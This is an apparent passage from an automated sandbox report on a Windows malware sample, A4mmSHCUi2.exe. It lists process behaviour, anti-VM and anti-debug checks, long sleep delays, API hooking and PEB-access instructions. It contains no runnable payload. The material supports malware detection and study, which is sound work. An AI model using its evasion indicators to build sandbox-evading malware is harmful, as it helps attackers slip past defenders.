Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: A4mmSHCUi2.exe PID: 7256, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\nslookup.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\nslookup.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\nslookup.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\nslookup.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\nslookup.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\nslookup.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\nslookup.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Memory allocated: 28C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Memory allocated: 2A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Memory allocated: 4A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Memory allocated: 8F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Memory allocated: 9F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Memory allocated: A110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Memory allocated: B110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Memory allocated: B530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Memory allocated: C530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Memory allocated: D530000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe

Code function: 5_2_01BF096E rdtsc

5_2_01BF096E

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5147	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1500	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Window / User API: threadDelayed 9834	Jump to behavior

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\nslookup.exe	API coverage: 2.4 %

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe TID: 7276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe TID: 8072	Thread sleep count: 139 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe TID: 8072	Thread sleep time: -278000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe TID: 8072	Thread sleep count: 9834 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe TID: 8072	Thread sleep time: -19668000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe TID: 8088	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe TID: 8088	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe TID: 8088	Thread sleep time: -55500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe TID: 8088	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe TID: 8088	Thread sleep time: -39000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\nslookup.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\nslookup.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\nslookup.exe

Code function: 11_2_02EBC400 FindFirstFileW,FindNextFileW,FindClose,

11_2_02EBC400

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: A4mmSHCUi2.exe, 00000000.00000002.1668794168.0000000000D31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wioTZtEQwu.exe, 0000000C.00000002.4107776642.00000000011AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: A4mmSHCUi2.exe, 00000000.00000002.1668794168.0000000000D31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: A4mmSHCUi2.exe, 00000000.00000002.1682403489.00000000072C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: nslookup.exe, 0000000B.00000002.4107199032.0000000002F2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 0000000D.00000002.2279609615.000001658B27C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVV

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe

Code function: 5_2_01BF096E rdtsc

5_2_01BF096E

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe

Code function: 5_2_00417623 LdrLoadDll,

5_2_00417623

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C761C3 mov eax, dword ptr fs:[00000030h]	5_2_01C761C3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C761C3 mov eax, dword ptr fs:[00000030h]	5_2_01C761C3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2E1D0 mov eax, dword ptr fs:[00000030h]	5_2_01C2E1D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2E1D0 mov eax, dword ptr fs:[00000030h]	5_2_01C2E1D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2E1D0 mov ecx, dword ptr fs:[00000030h]	5_2_01C2E1D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2E1D0 mov eax, dword ptr fs:[00000030h]	5_2_01C2E1D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2E1D0 mov eax, dword ptr fs:[00000030h]	5_2_01C2E1D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAA197 mov eax, dword ptr fs:[00000030h]	5_2_01BAA197
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAA197 mov eax, dword ptr fs:[00000030h]	5_2_01BAA197
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAA197 mov eax, dword ptr fs:[00000030h]	5_2_01BAA197
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C861E5 mov eax, dword ptr fs:[00000030h]	5_2_01C861E5
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF0185 mov eax, dword ptr fs:[00000030h]	5_2_01BF0185
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C54180 mov eax, dword ptr fs:[00000030h]	5_2_01C54180
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C54180 mov eax, dword ptr fs:[00000030h]	5_2_01C54180
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE01F8 mov eax, dword ptr fs:[00000030h]	5_2_01BE01F8
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C6C188 mov eax, dword ptr fs:[00000030h]	5_2_01C6C188
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C6C188 mov eax, dword ptr fs:[00000030h]	5_2_01C6C188
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3019F mov eax, dword ptr fs:[00000030h]	5_2_01C3019F
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3019F mov eax, dword ptr fs:[00000030h]	5_2_01C3019F
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3019F mov eax, dword ptr fs:[00000030h]	5_2_01C3019F
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3019F mov eax, dword ptr fs:[00000030h]	5_2_01C3019F
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C44144 mov eax, dword ptr fs:[00000030h]	5_2_01C44144
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C44144 mov eax, dword ptr fs:[00000030h]	5_2_01C44144
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C44144 mov ecx, dword ptr fs:[00000030h]	5_2_01C44144
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C44144 mov eax, dword ptr fs:[00000030h]	5_2_01C44144
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C44144 mov eax, dword ptr fs:[00000030h]	5_2_01C44144
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE0124 mov eax, dword ptr fs:[00000030h]	5_2_01BE0124
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C48158 mov eax, dword ptr fs:[00000030h]	5_2_01C48158
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C84164 mov eax, dword ptr fs:[00000030h]	5_2_01C84164
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C84164 mov eax, dword ptr fs:[00000030h]	5_2_01C84164
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E10E mov eax, dword ptr fs:[00000030h]	5_2_01C5E10E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E10E mov ecx, dword ptr fs:[00000030h]	5_2_01C5E10E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E10E mov eax, dword ptr fs:[00000030h]	5_2_01C5E10E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E10E mov eax, dword ptr fs:[00000030h]	5_2_01C5E10E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E10E mov ecx, dword ptr fs:[00000030h]	5_2_01C5E10E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E10E mov eax, dword ptr fs:[00000030h]	5_2_01C5E10E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E10E mov eax, dword ptr fs:[00000030h]	5_2_01C5E10E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E10E mov ecx, dword ptr fs:[00000030h]	5_2_01C5E10E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E10E mov eax, dword ptr fs:[00000030h]	5_2_01C5E10E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E10E mov ecx, dword ptr fs:[00000030h]	5_2_01C5E10E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C70115 mov eax, dword ptr fs:[00000030h]	5_2_01C70115
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5A118 mov ecx, dword ptr fs:[00000030h]	5_2_01C5A118
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5A118 mov eax, dword ptr fs:[00000030h]	5_2_01C5A118
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5A118 mov eax, dword ptr fs:[00000030h]	5_2_01C5A118
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5A118 mov eax, dword ptr fs:[00000030h]	5_2_01C5A118
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAC156 mov eax, dword ptr fs:[00000030h]	5_2_01BAC156
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB6154 mov eax, dword ptr fs:[00000030h]	5_2_01BB6154
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB6154 mov eax, dword ptr fs:[00000030h]	5_2_01BB6154
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BA80A0 mov eax, dword ptr fs:[00000030h]	5_2_01BA80A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C320DE mov eax, dword ptr fs:[00000030h]	5_2_01C320DE
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C360E0 mov eax, dword ptr fs:[00000030h]	5_2_01C360E0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB208A mov eax, dword ptr fs:[00000030h]	5_2_01BB208A
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAC0F0 mov eax, dword ptr fs:[00000030h]	5_2_01BAC0F0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF20F0 mov ecx, dword ptr fs:[00000030h]	5_2_01BF20F0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB80E9 mov eax, dword ptr fs:[00000030h]	5_2_01BB80E9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAA0E3 mov ecx, dword ptr fs:[00000030h]	5_2_01BAA0E3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C480A8 mov eax, dword ptr fs:[00000030h]	5_2_01C480A8
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C760B8 mov eax, dword ptr fs:[00000030h]	5_2_01C760B8
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C760B8 mov ecx, dword ptr fs:[00000030h]	5_2_01C760B8
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C36050 mov eax, dword ptr fs:[00000030h]	5_2_01C36050
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAA020 mov eax, dword ptr fs:[00000030h]	5_2_01BAA020
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAC020 mov eax, dword ptr fs:[00000030h]	5_2_01BAC020
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BCE016 mov eax, dword ptr fs:[00000030h]	5_2_01BCE016
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BCE016 mov eax, dword ptr fs:[00000030h]	5_2_01BCE016
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BCE016 mov eax, dword ptr fs:[00000030h]	5_2_01BCE016
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BCE016 mov eax, dword ptr fs:[00000030h]	5_2_01BCE016
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C34000 mov ecx, dword ptr fs:[00000030h]	5_2_01C34000
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C52000 mov eax, dword ptr fs:[00000030h]	5_2_01C52000
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C52000 mov eax, dword ptr fs:[00000030h]	5_2_01C52000
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C52000 mov eax, dword ptr fs:[00000030h]	5_2_01C52000
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C52000 mov eax, dword ptr fs:[00000030h]	5_2_01C52000
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C52000 mov eax, dword ptr fs:[00000030h]	5_2_01C52000
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C52000 mov eax, dword ptr fs:[00000030h]	5_2_01C52000
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C52000 mov eax, dword ptr fs:[00000030h]	5_2_01C52000
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C52000 mov eax, dword ptr fs:[00000030h]	5_2_01C52000
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDC073 mov eax, dword ptr fs:[00000030h]	5_2_01BDC073
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB2050 mov eax, dword ptr fs:[00000030h]	5_2_01BB2050
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C46030 mov eax, dword ptr fs:[00000030h]	5_2_01C46030
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C363C0 mov eax, dword ptr fs:[00000030h]	5_2_01C363C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C6C3CD mov eax, dword ptr fs:[00000030h]	5_2_01C6C3CD
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C543D4 mov eax, dword ptr fs:[00000030h]	5_2_01C543D4
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C543D4 mov eax, dword ptr fs:[00000030h]	5_2_01C543D4
